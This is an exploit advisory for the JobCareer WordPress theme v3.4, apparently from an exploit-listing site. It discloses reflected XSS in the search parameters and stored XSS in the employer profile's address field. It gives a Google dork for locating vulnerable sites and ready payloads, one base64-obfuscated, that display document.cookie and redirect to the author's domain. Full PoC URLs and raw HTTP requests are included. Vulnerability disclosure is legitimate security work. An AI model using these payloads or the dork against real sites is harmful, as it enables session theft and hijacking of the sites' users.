JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities

2020.07.27

Vlad Vector (RU)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: inurl:/wp-content/themes/jobcareer/

[+] Exploit Title: JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/jobcareer/
[+] Date: 2020-07-24
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Chimp Studio [ https://chimpgroup.com ]
[+] Software Version: 3.4
[+] Software Link: https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected & Authenticated Persistent XSS vulnerabilities was discovered in the JobCareer theme through 3.4 for WordPress.

[i] Unauthenticated Reflected XSS -> Vulnerable parameters: job_title, specialisms, location

[i] Authenticated Persistent XSS on Employer Profile -> «Complete Address» text field

[i] Demo account: vladvector / vector (login / password)

[i] PoC Employer Profile URL: http://jobcareer.chimpgroup.com/employer/vladvector/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS

[x] Authenticated Persistent XSS



### [ Payloads: ]

[$] "><svg/onload=eval(atob(`amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7`))>

[$] "><!--<img src="--><img src=x onerror=(alert)(`VLADVECTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru/`;//">



### [ PoC Unauthenticated Reflected XSS: ]

[!] http://jobcareer.chimpgroup.com/jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&cs_search_location_field=&location=&radius=5&cs_=&cs_=Find+Job

[!] GET /jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&cs_search_location_field=&location=&radius=5&cs_=&cs_=Find+Job HTTP/1.1
Host: jobcareer.chimpgroup.com



### [ PoC Authenticated Persistent XSS -> Employer Profile: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: jobcareer.chimpgroup.com
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------373898295520776006712397621876
Content-Length: 3832
Origin: http://jobcareer.chimpgroup.com
Referer: http://jobcareer.chimpgroup.com/employer-account/?profile_tab=profile
Cookie: [cookies_here]

-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="media_upload"

undefined
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cover_media_upload"

undefined
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_employer_img"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cover_employer_img"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="display_name"

VladVector
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_allow_search"

yes
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_specialisms[]"

banking
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="comp_detail"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_facebook"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_twitter"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_linkedin"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_phone_number"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_email"

wihovo6827@invql.com
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_url"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_country"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_city"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_comp_address"

"><!--<img src="--><img src=x onerror=(alert)(`VLAD\x20VECTOR`);window.location=`https://vladvector.ru/`;//">
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_address"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_latitude"

51.5073509
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_longitude"

-0.12775829999998223
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_add_new_loc"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_zoom"

11
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[established]"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[team-size]"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[type]"

private
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_profile"

update_profile
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_user"

12919
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="action"

ajax_employer_form_save
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="post_id"

12919
-----------------------------373898295520776006712397621876--



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

References:

https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-07-24-jobcareer-job-board-responsive-wordpress-theme-v3-4.txt

https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities

Dork: inurl:/wp-content/themes/jobcareer/

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.